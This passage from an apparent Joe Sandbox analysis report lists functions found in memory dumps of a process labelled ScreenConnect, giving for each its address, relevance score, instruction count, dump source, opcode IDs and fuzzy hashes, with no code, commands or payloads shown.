                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9416D707102068FD715DFB8D954AAE77E2BF88A14B14846CE416CB362EF74EC06DB91
                                                                                                                                                                                                                                                          Function 015C91A8 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: t*s
                                                                                                                                                                                                                                                          • API String ID: 0-1920582113
                                                                                                                                                                                                                                                          • Opcode ID: d99576fc94b31d27d60573463e4747dfaef613c2634402fe92b81926eeca0b52
                                                                                                                                                                                                                                                          • Instruction ID: 33b57fd2cc38d9132615f4ca57ed13d7f93a9879caded9a225f0f7b6bd9bf4df
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d99576fc94b31d27d60573463e4747dfaef613c2634402fe92b81926eeca0b52
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E11A371A00255DFEB21CEA8D840BEEBBF6BF85B10F1484A9D554DB145D3728901CB91
                                                                                                                                                                                                                                                          Function 015CD069 Relevance: .3, Instructions: 253COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c32758bc859ba27e7ef78991a74ed3f57c07a54b2d544fea7545ac3f476f606a
                                                                                                                                                                                                                                                          • Instruction ID: 8932f8039e92753f12dcbc0e32793eb2c18b3368a1b0e3db17fc8b183179e529
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c32758bc859ba27e7ef78991a74ed3f57c07a54b2d544fea7545ac3f476f606a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36A10574A002098FDB14DFA8D994AADB7F2BF89710B1485A8E406EB365DB75EC01CF80
                                                                                                                                                                                                                                                          Function 015CC6D0 Relevance: .2, Instructions: 249COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: dd4dc96acacd8f4492e027247865850880edbc8f7a871ca9205846ef54df881f
                                                                                                                                                                                                                                                          • Instruction ID: ed8bedeb8d59100d4142c7c34dca3b2b61eb04870ddf3440f24bdbfe5fc9f486
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd4dc96acacd8f4492e027247865850880edbc8f7a871ca9205846ef54df881f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CA16030A00309CFDB15EFA8C858AAEBBB2FF85710F11855DD41AAF365DB749985CB81
                                                                                                                                                                                                                                                          Function 03CF4798 Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 47c1ce1d67db1eec7ce4410b8eae3281cf7b1f2b4034f64f7121e16e74885ada
                                                                                                                                                                                                                                                          • Instruction ID: 462ec6c313c5e01998400a3e34b326e38f533d867e34c1716a3d29482e0692da
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47c1ce1d67db1eec7ce4410b8eae3281cf7b1f2b4034f64f7121e16e74885ada
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8271E175B002099FCB55DF79D884AAEBBF6FF88610B1480AAD506DB361DB30DD06CB91
                                                                                                                                                                                                                                                          Function 015CEF78 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 30bd20d8fb7174e549ab2dc7a7f69c88329d0c4ba1e0eeb19fbc223a6beba96a
                                                                                                                                                                                                                                                          • Instruction ID: 3da3308e4431722b8bc8ecb54953457f85607c4aa25cdcaac0b80f171fb703e1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30bd20d8fb7174e549ab2dc7a7f69c88329d0c4ba1e0eeb19fbc223a6beba96a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9617131F002198BEB15DFA9C8517AE7BB2AFC5B50F14852EE402BB384DF359D428795
                                                                                                                                                                                                                                                          Function 015C8D98 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e4ae41622af4c608fc0a17d5380223489d37682986ad47126fe478aeec2d1de5
                                                                                                                                                                                                                                                          • Instruction ID: c7a24b5ce4692ddc9474a966f4e7f7bf99149ccbc836deb81287dd48c8d7ce2c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4ae41622af4c608fc0a17d5380223489d37682986ad47126fe478aeec2d1de5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B561E574B106099FDB14DFA8D894AAEB7F2FF8D615B108198E506EB365DB30EC019B80
                                                                                                                                                                                                                                                          Function 015CE300 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5723942133b8a22b1a788f58fd97bf2587eec76888623720c1432c8922114bcc
                                                                                                                                                                                                                                                          • Instruction ID: b9f9653d5b015a54156628283b5a94ab06a20a4e3a0c9aa8ea98b91336c5da62
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5723942133b8a22b1a788f58fd97bf2587eec76888623720c1432c8922114bcc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A51353470030A9FDB15DFA8C895A6AB7F6FF98614714856CE546CF326DB34EC028B91
                                                                                                                                                                                                                                                          Function 015CE310 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: eb82e45ef3354dc071d662263b64daa1b81ddb25549fa2c59a3ccde120751939
                                                                                                                                                                                                                                                          • Instruction ID: bff98fb03548b4596ce8ba13f7f62782890bc65ba7978801a1c0ffd68971604e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb82e45ef3354dc071d662263b64daa1b81ddb25549fa2c59a3ccde120751939
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A51343470030A9FDB15DFA8C894A6AB7F6FF88610714846CE546CF326EB74EC028B91
                                                                                                                                                                                                                                                          Function 03CF3860 Relevance: .2, Instructions: 155COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0745e7309d3ab53bb5c93e40b9675cbf7eb0b3499ac279f4d5b5eaf88e03fbab
                                                                                                                                                                                                                                                          • Instruction ID: 3263d6307ef6267da4d22a824618c9c905be27e109a448b78e8ead4aa331c71c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0745e7309d3ab53bb5c93e40b9675cbf7eb0b3499ac279f4d5b5eaf88e03fbab
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7651F034700305EFC711EBB89951AAE77E6AFC5620B18C569D415DF381EF30DD098B92
                                                                                                                                                                                                                                                          Function 03CF2AB0 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 79fd4064685d2c7ee286c2b24e6f502aec7c5ae85ac7eaa3c070f3d13d425164
                                                                                                                                                                                                                                                          • Instruction ID: 3a618104cb564f82d9029d61fb018f523e72d1e81c3b0e55fa048fc344c69dc9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79fd4064685d2c7ee286c2b24e6f502aec7c5ae85ac7eaa3c070f3d13d425164
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 865135347007068FDB24DF29D880A5AF7F6FF887207148A58E596DB7A4EB30E9058F90
                                                                                                                                                                                                                                                          Function 015C842D Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b29daf80591fae036d81745bb8201e864264a048edb8735768d0b6d10160a0fa
                                                                                                                                                                                                                                                          • Instruction ID: 0d9c61203bffcdbb086f4c2d521e0cc8a53697e3d456b4ccdbeff9646a75c20f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b29daf80591fae036d81745bb8201e864264a048edb8735768d0b6d10160a0fa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 934161716047808FD712DF68D8A0595BBF1FF8A6247264ACED095CF7A2D730E809CB55
                                                                                                                                                                                                                                                          Function 015C84A0 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2e29cbea5f37b233834a6e1f1b7bad8d3c8f8459212581c1d351284afef75b9a
                                                                                                                                                                                                                                                          • Instruction ID: 89ea84a2ff373388577b13139d012a628a6d670c10b08155598891308b156a45
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e29cbea5f37b233834a6e1f1b7bad8d3c8f8459212581c1d351284afef75b9a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A510774600B018FD724CF69D884A6AB7F2FF89724B245A5CE596CB7A4DB31E842CB44
                                                                                                                                                                                                                                                          Function 03CF3851 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 08c7d481093eceabdcc3a087cb8c25e6a7b22e50c8794cf364b8c4169062dd81
                                                                                                                                                                                                                                                          • Instruction ID: 85b722bbeade397facb7bf58d6f2d496247ef7c74dc3bdcf514024e1363839cb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08c7d481093eceabdcc3a087cb8c25e6a7b22e50c8794cf364b8c4169062dd81
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3412134700341AFC712EBB88950A6EB7E6BFC5620B18C569D412DF385DF70DD0A8B92
                                                                                                                                                                                                                                                          Function 015CB2D0 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3c4f516b503f367fc487d228d68d5b795ce4a85ed742e8c7cad7d34a3a580131
                                                                                                                                                                                                                                                          • Instruction ID: e9405f2d3ea3a1b32dda3d3e8f192fa54c1b79e910a72e1a51c0007693440b4a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c4f516b503f367fc487d228d68d5b795ce4a85ed742e8c7cad7d34a3a580131
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3515870E003099FDB00EFB4D844BDDBBB2EF89710F108559E004AB290EB74A959DFA1
                                                                                                                                                                                                                                                          Function 015CB2C0 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2c7470cf93909f32b96ebf80bb4d253dad47e0679c1ed4c173813bff99b7b8d1
                                                                                                                                                                                                                                                          • Instruction ID: 3d43c058ac42eb0dd0aef84bd096f34e9c3f169b677852d4195b88d78742bbbe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c7470cf93909f32b96ebf80bb4d253dad47e0679c1ed4c173813bff99b7b8d1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F513870E003099FDB00EFA4D844BDDBBB2FF89710F208559E005AB290EB74A959DF95
                                                                                                                                                                                                                                                          Function 03CF4358 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8ed848287092cd6cee76335ca24f00a8602865a8f4c0e7477748cf31595f6829
                                                                                                                                                                                                                                                          • Instruction ID: cdab592de649f014109d52e6604f96ecf6a768fddf62889ae5f80934067061eb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ed848287092cd6cee76335ca24f00a8602865a8f4c0e7477748cf31595f6829
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E411974600B058FC778DF2AD84466BB7F1BF89224B144A6CE596DB7A4E730E906CB80
                                                                                                                                                                                                                                                          Function 015CEF67 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 22e02758b38c85a46deb87b57b7127dd83cfd098504df7712c29a1e7e373806a
                                                                                                                                                                                                                                                          • Instruction ID: 73487ca0699381ea4c2f23f643bf4bffc0d4b7b30d7a5807cda1d77282651b2d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22e02758b38c85a46deb87b57b7127dd83cfd098504df7712c29a1e7e373806a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE412171E002199FDB15DFE9C881BDEBBB6FF89B00F14812AE505BB240DB71A945CB91
                                                                                                                                                                                                                                                          Function 015C7E50 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ad716545b2a7bfff115207ad031bb4461854acd025506352fa81e1a2726b5b45
                                                                                                                                                                                                                                                          • Instruction ID: a2024f6ffdd9b546a919ea74a4d8a050420b54cb50689b1dcbb174319c894b31
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad716545b2a7bfff115207ad031bb4461854acd025506352fa81e1a2726b5b45
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4141B031A00206CFDB15DFA8E4946AEBBB6FF88714B08C519D9059F356DB34D906CF91
                                                                                                                                                                                                                                                          Function 015C9968 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1459a23241bf187fcd8bbb24a8a82f201afa7fc5d3beb3a9e47154040ef68097
                                                                                                                                                                                                                                                          • Instruction ID: 90cd07e21e7d394999f5b7415f00f17a7ba8dd4604c3d4078e058a91273710b2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1459a23241bf187fcd8bbb24a8a82f201afa7fc5d3beb3a9e47154040ef68097
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A417C71B102159FCB14DF69D894AADBBF2BF88724B14856CE406DB3A1DF709C05CB91
                                                                                                                                                                                                                                                          Function 015CAAB0 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d9a96ffe6ddc6f978bce7b1655dccf9238822300e327f835878a07065acee8e0
                                                                                                                                                                                                                                                          • Instruction ID: 508f74719889caf145495d4c767edc8291a0405c9b186a905556f0c286326bb9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9a96ffe6ddc6f978bce7b1655dccf9238822300e327f835878a07065acee8e0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D41E234B002558FD7209FA8D95476EBFE2BF80B04F18C96ED8558F292EB319C85C790
                                                                                                                                                                                                                                                          Function 03CF4128 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: cb3ff2a70bf565fbdc333f77293bd5b8e328392e3653bb21a9248cbaec2c8129
                                                                                                                                                                                                                                                          • Instruction ID: cd4d8df877607135751dec08337eaebe6ed6b905b0fa1f9dc6c6efa5c6a90f71
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb3ff2a70bf565fbdc333f77293bd5b8e328392e3653bb21a9248cbaec2c8129
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8413D706007058FD764DF2AC884A6BB7F6FF89360B14866CD596CB7A5E730E906CB90
                                                                                                                                                                                                                                                          Function 015C8C20 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 97408091f5195bd70a16e025874acc76e7b9fa8d62c946986753420a57ef3c81
                                                                                                                                                                                                                                                          • Instruction ID: 5d0d12c6bbfffa768e08bdf509aed7210295cc55e925bb38cece4235fafe7b03
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97408091f5195bd70a16e025874acc76e7b9fa8d62c946986753420a57ef3c81
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7241D175A002089FDB01EFB4D881BEDBBB2FF82620F148529D0059F256DB70AD16DB96
                                                                                                                                                                                                                                                          Function 015C4C61 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8186e7a54cf08ec47a47b7d139949d54077382d1da219ea987081deec7079937
                                                                                                                                                                                                                                                          • Instruction ID: 47f9ea744042e5c7042bdb93dd3790632f5dca0799fb7f308573ed430d16ba57
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8186e7a54cf08ec47a47b7d139949d54077382d1da219ea987081deec7079937
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0419D71A003299FEB20DFA4D815BAEBBB5FB45710F0085EAD508E7280DB745A45CF92
                                                                                                                                                                                                                                                          Function 015C9978 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
